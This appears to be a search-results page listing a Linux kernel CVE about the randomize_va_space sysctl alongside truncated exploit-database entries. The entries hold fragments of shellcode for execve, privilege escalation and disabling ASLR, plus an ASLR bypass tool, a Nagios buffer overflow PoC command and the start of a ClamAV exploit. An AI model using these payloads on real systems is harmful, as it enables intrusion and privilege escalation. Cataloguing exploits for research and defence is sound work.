CVE-2024-46826

In the Linux kernel, the following vulnerability has been resolved: ELF: fix kernel.randomizevaspace double read ELF loader uses "randomizevaspace" twice. It is sysctl and can change at any moment, so 2 loads could see 2 different values in theory with unpredictable consequences. Issue exactly on...

CVE-2024-46826 ELF: fix kernel.randomize_va_space double read

In the Linux kernel, the following vulnerability has been resolved: ELF: fix kernel.randomizevaspace double read ELF loader uses "randomizevaspace" twice. It is sysctl and can change at any moment, so 2 loads could see 2 different values in theory with unpredictable consequences. Issue exactly on...

Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)

Title: Linux/x86 - Execve Alphanumeric Shellcode 66 bytes Shellcode Author: bolonobolo Tested on: Linux x86 execve.asm global start section .text start: ; int 0x80 ------------ push 0x30 pop eax xor al, 0x30 push eax pop edx dec eax xor ax, 0x4f73 xor ax, 0x3041 push eax push edx pop eax...

ASLRay - Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying

Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying. Properties: ASLR bypass Cross-platform Minimalistic Simplicity Unpatchable Dependencies: Linux 2.6.12+ - will work on any x86-64 Debian-based OS BASH - the whole script Limitations: Stack needs to be executable -z execstack Binary has...

Linux/x86 - Disable ASLR Shellcode (80 bytes)

Linux/x86 - Disable ASLR Shellcode 80 bytes. Shellcode exploit for Linx86 platform / Linux/x86 setuid-disable-aslr.c by @abatchy17 - abatchy.com Shellcode size: 80 bytes SLAE-885 section .text global start start: ; ; setruid0,0 ; xor ecx,ecx mov ebx,ecx push 0x46 pop eax int 0x80 ; ;...

linux/x86 to see /proc/sys/kernel/randomize_va_space - 79 bytes

/ Exploit Title : linux/x86 execve"/bin/cat", "/bin/cat", "/proc/sys/kernel/randomizevaspace", NULL - 79 bytes Exploit Author : Febriyanto Nugroho Tested on : Linux Debian 5.0.5 / include char shellcode = "\x31\xdb" "\x6a\x17" "\x58" "\xcd\x80" "\x8d\x43\x0b" "\x99" "\x52" "\x68\x2f\x63\x61\x74"...

Linux/x86 - Disable randomize stack addresse - 106 bytes

No description provided by source. / Title: Linux/x86 - Disable randomize stack addresse - 106 bytes Set randomizevaspace to zero Author: Jonathan Salwan submit ! shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes...

Nagios Plugins check_ups - Local Buffer Overflow (PoC)

Advisory: Nagios Plugin 'checkups' local buffer overflow Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on nagios-plugins-1.4.15 Vendor URL: http://nagiosplugins.org/ ./checkups -u perl -e 'print "A"x16407' buffer overflow detected : ./checkups...

Linux/x86 - Disable randomize stack addresse - 106 bytes

Linux/x86 - Disable randomize stack addresse - 106 bytes. Shellcode exploit for linux platform / Title: Linux/x86 - Disable randomize stack addresse - 106 bytes Set randomizevaspace to zero Author: Jonathan Salwan Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Databas...

linux/x86 - setuid0 . setgid0 . aslr_off 79 bytes

linux/x86 setuid0 . setgid0 . aslroff 79 bytes. Shellcode exploit for linx86 platform / Linux/x86 Fedora 8 setuid0 + setgid0 + execve"echo 0 /proc/sys/kernel/randomizevaspace" by LiquidWorm 2008 c www.zeroscience.org liquidworm at gmail.com 79 bytes. / char sc = "\x6a\x17" // push $0x17 "\x58" //...

linux/x86 setuid(0) . setgid(0) . aslr_off 79 bytes

No description provided by source. / Linux/x86 Fedora 8 setuid0 + setgid0 + execve"echo 0 /proc/sys/kernel/randomizevaspace" by LiquidWorm 2008 c www.zeroscience.org liquidworm at gmail.com 79 bytes. / char sc = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" /...

ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow

''' clamav-0.91.2 exploit CVE-2007-6335 c Thomas Pollet [email protected] we own dsize in readdesc, src + dsize, exesectionsi + 1.rsz != exesectionsi + 1.rsz exploited with randomizevaspace = 0 ''' import struct exe=...